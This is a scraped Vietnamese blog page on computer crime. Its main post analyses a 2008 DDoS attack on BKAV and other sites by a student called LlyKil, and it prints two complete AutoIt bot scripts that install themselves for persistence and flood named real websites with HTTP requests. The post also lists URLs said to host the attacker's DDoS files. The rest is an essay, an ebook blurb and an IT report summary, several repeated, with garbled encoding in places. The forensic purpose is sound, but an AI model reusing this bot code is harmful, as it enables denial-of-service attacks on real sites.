Tổng hợp nghiên cứu về Tội phạm
Blog Archive
-
▼
2011
(249)
-
▼
February
(34)
- [Phân tích] Llykil đã DDOS BKAV như thế nào
- [Phân tích] Llykil đã DDOS BKAV như thế nào
- Tội phạm - vnhacker.blogspot.com
- Tội phạm - vnhacker.blogspot.com
- [Ebook] Computer Evidence - Collection and Preserv...
- [Ebook] Computer Evidence - Collection and Preserv...
- Toàn cảnh CNTT Việt Nam năm 2001
- Toàn cảnh CNTT Việt Nam năm 2001
- Báo cáo thương mại điện tử Việt Nam năm 2003
- Báo cáo thương mại điện tử Việt Nam năm 2003
- Computer Crime and Security survey CSI 2002
- Computer Crime and Security survey CSI 2002
- IC3 2003 Internet Fraud Report
- IC3 2003 Internet Fraud Report
- Computer crime and security survey 2008 pacific i...
- Computer crime and security survey 2008 pacific i...
- [Luật] Bộ Luật Tố tụng hình sự 2003
- [Luật] Bộ Luật Tố tụng hình sự 2003
- [Lượm] An introduction to SQL injection by dapirat...
- [Lượm] An introduction to SQL injection by dapirat...
- [Lượm] Advanced SQL Injection
- [Lượm] Advanced SQL Injection
- [Ebook] John Wiley & Sons - Incident Response. Com...
- [Ebook] John Wiley & Sons - Incident Response. Com...
- [Ebook] Scene of the Cybercrime, Second Edition
- [Ebook] Scene of the Cybercrime, Second Edition
- [Luật] Bộ luật Hình sự 1999 (sửa đổi 2009) - Bản F...
- [Luật] Bộ luật Hình sự 1999 (sửa đổi 2009) - Bản F...
- Đặc điểm pháp lý Tội phạm máy tính
- Đặc điểm pháp lý Tội phạm máy tính
- Tội phạm máy tính là gì?
- Tội phạm máy tính là gì?
- About me
- About me
-
▼
February
(34)
Powered by Blogger.
Từ sáng Chủ Nhật ngày 5/10/2008, trên một số diễn đàn trực tuyến chuyên về IT xuất hiện thông tin cho rằng vài website lớn tại Việt Nam bị tấn công từ chối dịch vụ (DDoS), mà chủ yếu là các website thương mại điện tử như 5giay, nhatnghe, BKAV. Hiện tượng này tái diễn liên tục trong hai ngày tiếp theo (5-7/10/2008).tiếp theo đó
Ngày 8/10, 5giay.vn là website đầu tiên khẳng định là nạn nhân của hình thức tấn công từ chối dịch vụ. Theo như thông tin 5giay cung cấp, đợt tấn công DDoS ngày 7/10 có qui mô lớn nhất từ trước đến nay từ hàng ngàn máy tính, dẫn đến hệ thống phần cứng quá tải và gián đoạn truy cập.
Bkis và phòng Phòng chống tội phạm công nghệ cao (C15 - Bộ Công An) chính thức bắt tay truy tìm thủ phạm từ ngày 7/10. Kết quả điều tra cho thấy kẻ gây ra vụ tấn công này là một học sinh Trung học tại Quảng Nam. Thủ phạm đã huy động bạn bè đi cài đặt virus tại các cửa hàng Game, Internet công cộng. Từ đây, virus tiếp tục phát tán qua USB. Bằng cách đó, học sinh này đã tạo dựng được một mạng Botnet với khoảng 1.000 máy tính bị cướp quyền điều khiển. Đây chính là công cụ để thực hiện tấn công DDoS vào một số website nêu trên vào ngày 8/10. Trước những bằng chứng không thể chối cãi, đối tượng đã thừa nhận hành vi vi phạm với tang vật là chiếc máy tính dùng "chỉ huy" các cuộc tấn công.Vậy vì sao?
Xem phân tích chi tiết của tác giả www.guru.net.vn
1. Code mã nguồn
#NoTrayIcon
#region
#AutoIt3Wrapper_res_comment=jhg
#AutoIt3Wrapper_res_description=jhgjhg
#AutoIt3Wrapper_res_fileversion=jhgjhg
#AutoIt3Wrapper_res_legalcopyright=jhgjhg
#endregion$PROCESS = ProcessList("chem.exe")
If $PROCESS[0][0] > 3 Then ExitFileCopy(@ScriptFullPath, @SystemDir & "\chem.exe", 1)RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Run", "chem", "REG_SZ", @SystemDir & "\chem.exe")
$1 = IniRead(@SystemDir & "\chem.ini", "1", "1", "")IniWrite(@SystemDir & "\chem.ini", "1", "1", $1 + 1)
If $1 = 2 Then
RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Wi ndows\CurrentVersion\Run", "chem")
EndIfTCPStartup()Dim $TIN[3]$TIN[0] = "bkav.com.vn"$TIN[1] = "bkav.com.vn"$TIN[2] = "bkav.com.vn"While 1
$NGAUNHIEN = Random(0, 2, 1)$DATASIZE = StringLen("")$HOST = $TIN[$NGAUNHIEN]$PAGE = "/home.aspx"$SOCKET = TCPConnect(TCPNameToIP($HOST), 80)$COMMAND = "POST " & $PAGE & " HTTP/1.1" & @CRLF
$COMMAND &= "Host: " & $HOST & @CRLF
$COMMAND &= "User-Agent: top1.vn" & @CRLF
$COMMAND &= "Connection: close" & @CRLF
$COMMAND &= "Referer: http://top1.vn" & @CRLF
$COMMAND &= "Content-Type: application/x-www-form-urlencoded" & @CRLF
$COMMAND &= "Content-Length: " & $DATASIZE & @CRLF
$COMMAND &= "Authorization: Basic QG11dmlldDpAbXV2aWV0" & @CRLF
$COMMAND &= "" & @CRLF
TCPSend($SOCKET, $COMMAND)WEnd
thêm nữa:#NoTrayIcon
#region
#AutoIt3Wrapper_res_comment=jhg
#AutoIt3Wrapper_res_description=jhgjhg
#AutoIt3Wrapper_res_fileversion=jhgjhg
#AutoIt3Wrapper_res_legalcopyright=jhgjhg
#endregion$PROCESS = ProcessList("khpt.exe")
If $PROCESS[0][0] > 3 Then ExitFileCopy(@ScriptFullPath, @SystemDir & "\khpt.exe", 1)RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Run", "khpt", "REG_SZ", @SystemDir & "\khpt.exe")
$1 = IniRead(@SystemDir & "\khpt.ini", "1", "1", "")IniWrite(@SystemDir & "\khpt.ini", "1", "1", $1 + 1)
If $1 = 5 Then
RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Wi ndows\CurrentVersion\Run", "khpt")
EndIfTCPStartup()Dim $TIN[3]$TIN[0] = "khpt.vn"$TIN[1] = "khpt.vn"$TIN[2] = "khpt.vn"While 1
$NGAUNHIEN = Random(0, 2, 1)$DATASIZE = StringLen("")$HOST = $TIN[$NGAUNHIEN]$PAGE = "/forum//index.php"$SOCKET = TCPConnect(TCPNameToIP($HOST), 80)$COMMAND = "POST " & $PAGE & " HTTP/1.1" & @CRLF
$COMMAND &= "Host: " & $HOST & @CRLF
$COMMAND &= "User-Agent: LlyKil" & @CRLF
$COMMAND &= "Connection: close" & @CRLF
$COMMAND &= "Referer: http://google.com" & @CRLF
$COMMAND &= "Content-Type: application/x-www-form-urlencoded" & @CRLF
$COMMAND &= "Content-Length: " & $DATASIZE & @CRLF
$COMMAND &= "Authorization: Basic QG11dmlldDpAbXV2aWV0" & @CRLF
$COMMAND &= "" & @CRLF
TCPSend($SOCKET, $COMMAND)WEnd
Có đoạn ghi:Đoạn này có thông tin rất cụ thể về LliKil
$COMMAND &= "User-Agent: LlyKil" & @CRL
Hành động của LlyKil thực ra đã bị nhiều hệ thống ghi nhận và phát hiện. Các đoạn mã LlyKil
viết bằng AutoIt3.
2, Thông tin của Llykil
Trên hình ảnh đã mô tả rõ đặc tính của các chương trình do LlyKil viêt ra : như có kết nối qua IRC kênh #LlyKil,...
Một trong các cách phán toán bot là LlyKil viết chương trình crack BKAV Pro và tung lên mạng (crack dc hay ko thì tôi không chắc)
Một trong số các site chứa mã DDoS hiện nay vẫn tồn tại đó là :
http://diemhen.net/llykil/Server.php
http://diemhen.net/llykil/Update.exe
LlyKil từng lưu trữ các dữ liệu và công cụ phục vụ tấn công trên nhiều site trong đó có trang của chính LlyKil http://llykil.net/
Hình ảnh trang chu trang nay do google cache lại được:
Hình ảnh trên một server khác, nơi được dùng để chứa đồ nghề.
Với những dâu vết để lại như vậy cộng thêm log file của máy chủ thì không khó khăn lắm để có thể nhận ra ai là chủ các cuộc tấn công DDoS trong thời gian qua.
LlyKil đã bị bắt là tấm gương cho các bạn đang đi theo con đường này.
DDoS là một hành vi xấu, ngay cả với giới hacker DDoS được coi là "chơi bẩn". Tuy nhiên để thực hiện được các vụ DDoS cũng đòi hỏi có hiểu biết nhất định. Để chống DDoS mà không biết về DDoS thì thật là khó. Hy vọng những bạn có hiểu biết về DDoS không dùng vào mục đích tấn công.
Video DDOS Trường Tồn (tương tự BKAV)
http://www.mediafire.com/?hobkjoa5dj7qfab
Monday, February 28, 2011
|
Posted under:
CHỨNG CỨ ĐIỆN TỬ,
PHÂN TÍCH,
TỘI PHẠM MÁY TÍNH
|
1 comments
Read more
Từ sáng Chủ Nhật ngày 5/10/2008, trên một số diễn đàn trực tuyến chuyên về IT xuất hiện thông tin cho rằng vài website lớn tại Việt Nam bị tấn công từ chối dịch vụ (DDoS), mà chủ yếu là các website thương mại điện tử như 5giay, nhatnghe, BKAV. Hiện tượng này tái diễn liên tục trong hai ngày tiếp theo (5-7/10/2008).tiếp theo đó
Ngày 8/10, 5giay.vn là website đầu tiên khẳng định là nạn nhân của hình thức tấn công từ chối dịch vụ. Theo như thông tin 5giay cung cấp, đợt tấn công DDoS ngày 7/10 có qui mô lớn nhất từ trước đến nay từ hàng ngàn máy tính, dẫn đến hệ thống phần cứng quá tải và gián đoạn truy cập.
Bkis và phòng Phòng chống tội phạm công nghệ cao (C15 - Bộ Công An) chính thức bắt tay truy tìm thủ phạm từ ngày 7/10. Kết quả điều tra cho thấy kẻ gây ra vụ tấn công này là một học sinh Trung học tại Quảng Nam. Thủ phạm đã huy động bạn bè đi cài đặt virus tại các cửa hàng Game, Internet công cộng. Từ đây, virus tiếp tục phát tán qua USB. Bằng cách đó, học sinh này đã tạo dựng được một mạng Botnet với khoảng 1.000 máy tính bị cướp quyền điều khiển. Đây chính là công cụ để thực hiện tấn công DDoS vào một số website nêu trên vào ngày 8/10. Trước những bằng chứng không thể chối cãi, đối tượng đã thừa nhận hành vi vi phạm với tang vật là chiếc máy tính dùng "chỉ huy" các cuộc tấn công.Vậy vì sao?
Xem phân tích chi tiết của tác giả www.guru.net.vn
1. Code mã nguồn
#NoTrayIcon
#region
#AutoIt3Wrapper_res_comment=jhg
#AutoIt3Wrapper_res_description=jhgjhg
#AutoIt3Wrapper_res_fileversion=jhgjhg
#AutoIt3Wrapper_res_legalcopyright=jhgjhg
#endregion$PROCESS = ProcessList("chem.exe")
If $PROCESS[0][0] > 3 Then ExitFileCopy(@ScriptFullPath, @SystemDir & "\chem.exe", 1)RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Run", "chem", "REG_SZ", @SystemDir & "\chem.exe")
$1 = IniRead(@SystemDir & "\chem.ini", "1", "1", "")IniWrite(@SystemDir & "\chem.ini", "1", "1", $1 + 1)
If $1 = 2 Then
RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Wi ndows\CurrentVersion\Run", "chem")
EndIfTCPStartup()Dim $TIN[3]$TIN[0] = "bkav.com.vn"$TIN[1] = "bkav.com.vn"$TIN[2] = "bkav.com.vn"While 1
$NGAUNHIEN = Random(0, 2, 1)$DATASIZE = StringLen("")$HOST = $TIN[$NGAUNHIEN]$PAGE = "/home.aspx"$SOCKET = TCPConnect(TCPNameToIP($HOST), 80)$COMMAND = "POST " & $PAGE & " HTTP/1.1" & @CRLF
$COMMAND &= "Host: " & $HOST & @CRLF
$COMMAND &= "User-Agent: top1.vn" & @CRLF
$COMMAND &= "Connection: close" & @CRLF
$COMMAND &= "Referer: http://top1.vn" & @CRLF
$COMMAND &= "Content-Type: application/x-www-form-urlencoded" & @CRLF
$COMMAND &= "Content-Length: " & $DATASIZE & @CRLF
$COMMAND &= "Authorization: Basic QG11dmlldDpAbXV2aWV0" & @CRLF
$COMMAND &= "" & @CRLF
TCPSend($SOCKET, $COMMAND)WEnd
thêm nữa:#NoTrayIcon
#region
#AutoIt3Wrapper_res_comment=jhg
#AutoIt3Wrapper_res_description=jhgjhg
#AutoIt3Wrapper_res_fileversion=jhgjhg
#AutoIt3Wrapper_res_legalcopyright=jhgjhg
#endregion$PROCESS = ProcessList("khpt.exe")
If $PROCESS[0][0] > 3 Then ExitFileCopy(@ScriptFullPath, @SystemDir & "\khpt.exe", 1)RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Run", "khpt", "REG_SZ", @SystemDir & "\khpt.exe")
$1 = IniRead(@SystemDir & "\khpt.ini", "1", "1", "")IniWrite(@SystemDir & "\khpt.ini", "1", "1", $1 + 1)
If $1 = 5 Then
RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Wi ndows\CurrentVersion\Run", "khpt")
EndIfTCPStartup()Dim $TIN[3]$TIN[0] = "khpt.vn"$TIN[1] = "khpt.vn"$TIN[2] = "khpt.vn"While 1
$NGAUNHIEN = Random(0, 2, 1)$DATASIZE = StringLen("")$HOST = $TIN[$NGAUNHIEN]$PAGE = "/forum//index.php"$SOCKET = TCPConnect(TCPNameToIP($HOST), 80)$COMMAND = "POST " & $PAGE & " HTTP/1.1" & @CRLF
$COMMAND &= "Host: " & $HOST & @CRLF
$COMMAND &= "User-Agent: LlyKil" & @CRLF
$COMMAND &= "Connection: close" & @CRLF
$COMMAND &= "Referer: http://google.com" & @CRLF
$COMMAND &= "Content-Type: application/x-www-form-urlencoded" & @CRLF
$COMMAND &= "Content-Length: " & $DATASIZE & @CRLF
$COMMAND &= "Authorization: Basic QG11dmlldDpAbXV2aWV0" & @CRLF
$COMMAND &= "" & @CRLF
TCPSend($SOCKET, $COMMAND)WEnd
Có đoạn ghi:Đoạn này có thông tin rất cụ thể về LliKil
$COMMAND &= "User-Agent: LlyKil" & @CRL
Hành động của LlyKil thực ra đã bị nhiều hệ thống ghi nhận và phát hiện. Các đoạn mã LlyKil
viết bằng AutoIt3.
2, Thông tin của Llykil
Trên hình ảnh đã mô tả rõ đặc tính của các chương trình do LlyKil viêt ra : như có kết nối qua IRC kênh #LlyKil,...
Một trong các cách phán toán bot là LlyKil viết chương trình crack BKAV Pro và tung lên mạng (crack dc hay ko thì tôi không chắc)
Một trong số các site chứa mã DDoS hiện nay vẫn tồn tại đó là :
http://diemhen.net/llykil/Server.php
http://diemhen.net/llykil/Update.exe
LlyKil từng lưu trữ các dữ liệu và công cụ phục vụ tấn công trên nhiều site trong đó có trang của chính LlyKil http://llykil.net/
Hình ảnh trang chu trang nay do google cache lại được:
Hình ảnh trên một server khác, nơi được dùng để chứa đồ nghề.
Với những dâu vết để lại như vậy cộng thêm log file của máy chủ thì không khó khăn lắm để có thể nhận ra ai là chủ các cuộc tấn công DDoS trong thời gian qua.
LlyKil đã bị bắt là tấm gương cho các bạn đang đi theo con đường này.
DDoS là một hành vi xấu, ngay cả với giới hacker DDoS được coi là "chơi bẩn". Tuy nhiên để thực hiện được các vụ DDoS cũng đòi hỏi có hiểu biết nhất định. Để chống DDoS mà không biết về DDoS thì thật là khó. Hy vọng những bạn có hiểu biết về DDoS không dùng vào mục đích tấn công.
Video DDOS Trường Tồn (tương tự BKAV)
http://www.mediafire.com/?hobkjoa5dj7qfab
Hồi nhỏ và ngay cả bây giờ, nhiều lúc tôi tự hỏi, làm sao người ta bắt được tội phạm nhỉ? Tôi luôn nghĩ rằng chỉ cần tên tội phạm cẩn thận một chút thì chẳng có cách nào chứng minh được hắn phạm tội cả.
Ví dụ như nếu giết người, hắn chỉ cần kĩ lưỡng xóa dấu vân tay, quăng khẩu súng xuống sông hay biển gì đó, giấu luôn xác chết rồi tạo chứng cứ ngoại phạm. Vậy mà những kẻ làm hết tất cả việc đó một cách chuyên nghiệp vẫn bị bắt như thường.
Người ta nói lưới trời lồng lộng, tuy thưa mà khó thoát là vậy. Hay nói cách khác, nếu muốn người ta không biết, trừ phi mình không làm. Haha hai câu này giống trong phim bộ Hồng Kông quá.
Hồi lúc mới tập tễnh bước chân vào lĩnh vực bảo mật, ước mơ lớn nhất của tôi là trở thành một tay cảnh sát điều tra chuyên về tội phạm liên quan đến máy tính, hay còn gọi tội phạm công nghệ cao như báo chí vẫn thường nói.
Chắc là do tôi đọc nhiều tiểu thuyết trinh thám máy tính quá :-p. Cũng có thể do tôi thích tìm hiểu tâm lý của bọn tội phạm.
Khi tìm hiểu một vụ nào đó, tôi thường tự hỏi (và cố tìm câu trả lời một cách thích thú), lúc thực hiện hành động này, tên tội phạm đang nghĩ gì nhỉ; mục đích của hắn là gì, tại sao hắn lại làm A, mà không làm B hay C.
Nói nghe có thể làm cho bạn giật mình, tôi thường nghĩ theo cách bọn tội phạm nghĩ. Ví dụ như khi bước chân vào một siêu thị, tôi thích nghĩ đến việc làm thế nào để chôm đồ của siêu thị mà không bị phát hiện. Hoặc khi vào trụ sở của một công ti nào đó, tôi cũng thường quan sát để tìm cách lọt qua các camera quan sát mà không bị ghi hình. Dĩ nhiên tôi chỉ nghĩ cho vui (theo thói quen nghề nghiệp), chứ nếu tôi làm thiệt thì chắc giờ tôi không còn ngồi đây viết blog rồi :-p.
Thường người ta có khuynh hướng cho rằng, tội phạm có liên quan đến máy tính và Internet thì khó bắt hơn tội phạm thông thường. Chúng (có vẻ) vô hình mà. Mọi người thường nghĩ bắt tên trộm chiếc xe bao giờ cũng dễ hơn tìm ra tên đã đánh cắp tài khoản hộp mail.
Thật tế cả hai đều khó (hoặc dễ) như nhau, tùy theo trình độ của tên tội phạm. Nếu chỉ xét đến đám tội phạm còn non kinh nghiệm, mới phạm tội vài lần, tôi nghĩ rằng truy lùng tội phạm máy tính dễ hơn là tội phạm thông thường. Thiệt ra tôi chưa truy lùng tội phạm thông thường lần nào :-p, nên tôi chỉ nói một cách chủ quan vậy thôi.
Không có gì là vô hình trên Internet cả. Mỗi hành động của bạn đều được ghi lại ở đâu đó, vô tình hay cố ý, bắt buộc hay không bắt buộc. Nếu muốn, vào ngày này năm sau, người ta vẫn có thể biết được rằng, hôm nay vào giờ này, bạn đang đọc blog của tôi.
Khi ai đó muốn xóa dấu vết của hắn ở ngoài đời, hắn chỉ cần lau thật sạch dấu vân tay và vết giày dép nếu có. Sẽ không hề đơn giản như thế nếu hắn muốn xóa thông tin lưu trong máy tính. Một khi bạn đã lưu trữ thông tin vào máy tính, hầu như bạn chẳng còn cơ hội nào để xóa nó đi. Dĩ nhiên bạn có thể đốt cháy máy tính của mình, nhưng vẫn còn có rất nhiều máy tính khác ngoài kia trên Internet có chứa thông tin liên quan đến bạn.
Rất ít người hiểu được điều này, đó cũng là lý do ngày càng có nhiều người sử dụng Internet làm công cụ để thực hiện hành vi phạm pháp. Họ nghĩ rằng Internet sẽ che chở họ, mà không biết rằng, chính Internet đã góp phần rất lớn để tìm ra họ.
Chẳng có đường sống nào một khi đã phạm tội, vậy nên hãy tập sống lương thiện!
Hồi nhỏ và ngay cả bây giờ, nhiều lúc tôi tự hỏi, làm sao người ta bắt được tội phạm nhỉ? Tôi luôn nghĩ rằng chỉ cần tên tội phạm cẩn thận một chút thì chẳng có cách nào chứng minh được hắn phạm tội cả.
Ví dụ như nếu giết người, hắn chỉ cần kĩ lưỡng xóa dấu vân tay, quăng khẩu súng xuống sông hay biển gì đó, giấu luôn xác chết rồi tạo chứng cứ ngoại phạm. Vậy mà những kẻ làm hết tất cả việc đó một cách chuyên nghiệp vẫn bị bắt như thường.
Người ta nói lưới trời lồng lộng, tuy thưa mà khó thoát là vậy. Hay nói cách khác, nếu muốn người ta không biết, trừ phi mình không làm. Haha hai câu này giống trong phim bộ Hồng Kông quá.
Hồi lúc mới tập tễnh bước chân vào lĩnh vực bảo mật, ước mơ lớn nhất của tôi là trở thành một tay cảnh sát điều tra chuyên về tội phạm liên quan đến máy tính, hay còn gọi tội phạm công nghệ cao như báo chí vẫn thường nói.
Chắc là do tôi đọc nhiều tiểu thuyết trinh thám máy tính quá :-p. Cũng có thể do tôi thích tìm hiểu tâm lý của bọn tội phạm.
Khi tìm hiểu một vụ nào đó, tôi thường tự hỏi (và cố tìm câu trả lời một cách thích thú), lúc thực hiện hành động này, tên tội phạm đang nghĩ gì nhỉ; mục đích của hắn là gì, tại sao hắn lại làm A, mà không làm B hay C.
Nói nghe có thể làm cho bạn giật mình, tôi thường nghĩ theo cách bọn tội phạm nghĩ. Ví dụ như khi bước chân vào một siêu thị, tôi thích nghĩ đến việc làm thế nào để chôm đồ của siêu thị mà không bị phát hiện. Hoặc khi vào trụ sở của một công ti nào đó, tôi cũng thường quan sát để tìm cách lọt qua các camera quan sát mà không bị ghi hình. Dĩ nhiên tôi chỉ nghĩ cho vui (theo thói quen nghề nghiệp), chứ nếu tôi làm thiệt thì chắc giờ tôi không còn ngồi đây viết blog rồi :-p.
Thường người ta có khuynh hướng cho rằng, tội phạm có liên quan đến máy tính và Internet thì khó bắt hơn tội phạm thông thường. Chúng (có vẻ) vô hình mà. Mọi người thường nghĩ bắt tên trộm chiếc xe bao giờ cũng dễ hơn tìm ra tên đã đánh cắp tài khoản hộp mail.
Thật tế cả hai đều khó (hoặc dễ) như nhau, tùy theo trình độ của tên tội phạm. Nếu chỉ xét đến đám tội phạm còn non kinh nghiệm, mới phạm tội vài lần, tôi nghĩ rằng truy lùng tội phạm máy tính dễ hơn là tội phạm thông thường. Thiệt ra tôi chưa truy lùng tội phạm thông thường lần nào :-p, nên tôi chỉ nói một cách chủ quan vậy thôi.
Không có gì là vô hình trên Internet cả. Mỗi hành động của bạn đều được ghi lại ở đâu đó, vô tình hay cố ý, bắt buộc hay không bắt buộc. Nếu muốn, vào ngày này năm sau, người ta vẫn có thể biết được rằng, hôm nay vào giờ này, bạn đang đọc blog của tôi.
Khi ai đó muốn xóa dấu vết của hắn ở ngoài đời, hắn chỉ cần lau thật sạch dấu vân tay và vết giày dép nếu có. Sẽ không hề đơn giản như thế nếu hắn muốn xóa thông tin lưu trong máy tính. Một khi bạn đã lưu trữ thông tin vào máy tính, hầu như bạn chẳng còn cơ hội nào để xóa nó đi. Dĩ nhiên bạn có thể đốt cháy máy tính của mình, nhưng vẫn còn có rất nhiều máy tính khác ngoài kia trên Internet có chứa thông tin liên quan đến bạn.
Rất ít người hiểu được điều này, đó cũng là lý do ngày càng có nhiều người sử dụng Internet làm công cụ để thực hiện hành vi phạm pháp. Họ nghĩ rằng Internet sẽ che chở họ, mà không biết rằng, chính Internet đã góp phần rất lớn để tìm ra họ.
Chẳng có đường sống nào một khi đã phạm tội, vậy nên hãy tập sống lương thiện!
In life we hardly ever go it alone. The same holds true when taking on writing projects
such as Computer Evidence: Collection and Preservation, Second Edition. Many people,
such as the technical and copy editors including Adam Speer, Leo Manning, Erin
Kenneally, Gary Kessler, Karen Gill, and the Cengage Learning staff, have contributed
significantly to the creation of this book. I would like to specifically call attention to
and thank members of the High Technology Crime Investigation Association
(HTCIA) and High Tech Crime Consortium (HTCC), List Servers for their support
and mentoring over the years. This book could not have been created without
their vast cumulative knowledge. I would also like to thank Alex Augustin for his
years of support, and Steven Richardson and Ted Augustine for taking up the slack at
Technology Pathways.
http://www.mediafire.com/?wq8olv37ryatv26
such as Computer Evidence: Collection and Preservation, Second Edition. Many people,
such as the technical and copy editors including Adam Speer, Leo Manning, Erin
Kenneally, Gary Kessler, Karen Gill, and the Cengage Learning staff, have contributed
significantly to the creation of this book. I would like to specifically call attention to
and thank members of the High Technology Crime Investigation Association
(HTCIA) and High Tech Crime Consortium (HTCC), List Servers for their support
and mentoring over the years. This book could not have been created without
their vast cumulative knowledge. I would also like to thank Alex Augustin for his
years of support, and Steven Richardson and Ted Augustine for taking up the slack at
Technology Pathways.
http://www.mediafire.com/?wq8olv37ryatv26
In life we hardly ever go it alone. The same holds true when taking on writing projects
such as Computer Evidence: Collection and Preservation, Second Edition. Many people,
such as the technical and copy editors including Adam Speer, Leo Manning, Erin
Kenneally, Gary Kessler, Karen Gill, and the Cengage Learning staff, have contributed
significantly to the creation of this book. I would like to specifically call attention to
and thank members of the High Technology Crime Investigation Association
(HTCIA) and High Tech Crime Consortium (HTCC), List Servers for their support
and mentoring over the years. This book could not have been created without
their vast cumulative knowledge. I would also like to thank Alex Augustin for his
years of support, and Steven Richardson and Ted Augustine for taking up the slack at
Technology Pathways.
http://www.mediafire.com/?wq8olv37ryatv26
such as Computer Evidence: Collection and Preservation, Second Edition. Many people,
such as the technical and copy editors including Adam Speer, Leo Manning, Erin
Kenneally, Gary Kessler, Karen Gill, and the Cengage Learning staff, have contributed
significantly to the creation of this book. I would like to specifically call attention to
and thank members of the High Technology Crime Investigation Association
(HTCIA) and High Tech Crime Consortium (HTCC), List Servers for their support
and mentoring over the years. This book could not have been created without
their vast cumulative knowledge. I would also like to thank Alex Augustin for his
years of support, and Steven Richardson and Ted Augustine for taking up the slack at
Technology Pathways.
http://www.mediafire.com/?wq8olv37ryatv26
Cuối năm 2000 - đầu năm 2001 là thời kỳ đầy biến động trong lĩnh CNTT cả trong n-ớc và quốc tế.
Trong n-ớc, đây là thời kỳ hy vọng có các b-ớc ngoặt đánh dấu một b-ớc phát triển mạnh trong ứng
dụng và phát triển ngành công nghiệp CNTT - đ-ợc thể hiện bằng hàng loạt các chính sách, biện pháp
từ trung -ơng đến địa ph-ơng. Trên thị tr-ờng CNTT quốc tế - cuộc suy thoái đầu tiên của thời kỳ kinh
tế số và sụp đổ của các công ty Internet ảnh h-ởng không ít đến chiến l-ợc phát triển CNTT của các
tập đoàn CNTT và các quốc gia.
Báo cáo "Toàn cảnh CNTT Việt nam 2001" của Hội Tin Học TP HCM gồm 6 phần:
• Công nghiệp máy tính-viễn thông quốc tế
• Chính sách CNTT
• Thị tr-ờng CNTT
• Thị tr-ờng phần mềm và doanh nghiệp phần mềm
• Internet Việt nam
• Đào tạo nhân lực CNTT
Phần đầu điểm qua tình hình CNTT quốc tế và ảnh h-ởng của tình hình này đối với Việt nam. Các
phần tiếp theo phân tích và đánh giá hiện trạng của những nội dung quan trọng nhất trong phát triển
sản xuất và ứng dụng CNTT tại Việt nam. Do thời gian và số liệu có hạn, các phân tích và đánh giá
ch-a thể thực sự sâu sắc và toàn diện. Hội Tin Học TP Hồ Chí Minh mong nhận đ-ợc các thông tin
thêm vá các ý kiến đóng góp để có thể có đ-ợc bức tranh đầy đủ hơn về CNTT n-ớc ta.
http://www.mediafire.com/?d18xo7b5ccbp445
Trong n-ớc, đây là thời kỳ hy vọng có các b-ớc ngoặt đánh dấu một b-ớc phát triển mạnh trong ứng
dụng và phát triển ngành công nghiệp CNTT - đ-ợc thể hiện bằng hàng loạt các chính sách, biện pháp
từ trung -ơng đến địa ph-ơng. Trên thị tr-ờng CNTT quốc tế - cuộc suy thoái đầu tiên của thời kỳ kinh
tế số và sụp đổ của các công ty Internet ảnh h-ởng không ít đến chiến l-ợc phát triển CNTT của các
tập đoàn CNTT và các quốc gia.
Báo cáo "Toàn cảnh CNTT Việt nam 2001" của Hội Tin Học TP HCM gồm 6 phần:
• Công nghiệp máy tính-viễn thông quốc tế
• Chính sách CNTT
• Thị tr-ờng CNTT
• Thị tr-ờng phần mềm và doanh nghiệp phần mềm
• Internet Việt nam
• Đào tạo nhân lực CNTT
Phần đầu điểm qua tình hình CNTT quốc tế và ảnh h-ởng của tình hình này đối với Việt nam. Các
phần tiếp theo phân tích và đánh giá hiện trạng của những nội dung quan trọng nhất trong phát triển
sản xuất và ứng dụng CNTT tại Việt nam. Do thời gian và số liệu có hạn, các phân tích và đánh giá
ch-a thể thực sự sâu sắc và toàn diện. Hội Tin Học TP Hồ Chí Minh mong nhận đ-ợc các thông tin
thêm vá các ý kiến đóng góp để có thể có đ-ợc bức tranh đầy đủ hơn về CNTT n-ớc ta.
http://www.mediafire.com/?d18xo7b5ccbp445
Cuối năm 2000 - đầu năm 2001 là thời kỳ đầy biến động trong lĩnh CNTT cả trong n-ớc và quốc tế.
Trong n-ớc, đây là thời kỳ hy vọng có các b-ớc ngoặt đánh dấu một b-ớc phát triển mạnh trong ứng
dụng và phát triển ngành công nghiệp CNTT - đ-ợc thể hiện bằng hàng loạt các chính sách, biện pháp
từ trung -ơng đến địa ph-ơng. Trên thị tr-ờng CNTT quốc tế - cuộc suy thoái đầu tiên của thời kỳ kinh
tế số và sụp đổ của các công ty Internet ảnh h-ởng không ít đến chiến l-ợc phát triển CNTT của các
tập đoàn CNTT và các quốc gia.
Báo cáo "Toàn cảnh CNTT Việt nam 2001" của Hội Tin Học TP HCM gồm 6 phần:
• Công nghiệp máy tính-viễn thông quốc tế
• Chính sách CNTT
• Thị tr-ờng CNTT
• Thị tr-ờng phần mềm và doanh nghiệp phần mềm
• Internet Việt nam
• Đào tạo nhân lực CNTT
Phần đầu điểm qua tình hình CNTT quốc tế và ảnh h-ởng của tình hình này đối với Việt nam. Các
phần tiếp theo phân tích và đánh giá hiện trạng của những nội dung quan trọng nhất trong phát triển
sản xuất và ứng dụng CNTT tại Việt nam. Do thời gian và số liệu có hạn, các phân tích và đánh giá
ch-a thể thực sự sâu sắc và toàn diện. Hội Tin Học TP Hồ Chí Minh mong nhận đ-ợc các thông tin
thêm vá các ý kiến đóng góp để có thể có đ-ợc bức tranh đầy đủ hơn về CNTT n-ớc ta.
http://www.mediafire.com/?d18xo7b5ccbp445
Trong n-ớc, đây là thời kỳ hy vọng có các b-ớc ngoặt đánh dấu một b-ớc phát triển mạnh trong ứng
dụng và phát triển ngành công nghiệp CNTT - đ-ợc thể hiện bằng hàng loạt các chính sách, biện pháp
từ trung -ơng đến địa ph-ơng. Trên thị tr-ờng CNTT quốc tế - cuộc suy thoái đầu tiên của thời kỳ kinh
tế số và sụp đổ của các công ty Internet ảnh h-ởng không ít đến chiến l-ợc phát triển CNTT của các
tập đoàn CNTT và các quốc gia.
Báo cáo "Toàn cảnh CNTT Việt nam 2001" của Hội Tin Học TP HCM gồm 6 phần:
• Công nghiệp máy tính-viễn thông quốc tế
• Chính sách CNTT
• Thị tr-ờng CNTT
• Thị tr-ờng phần mềm và doanh nghiệp phần mềm
• Internet Việt nam
• Đào tạo nhân lực CNTT
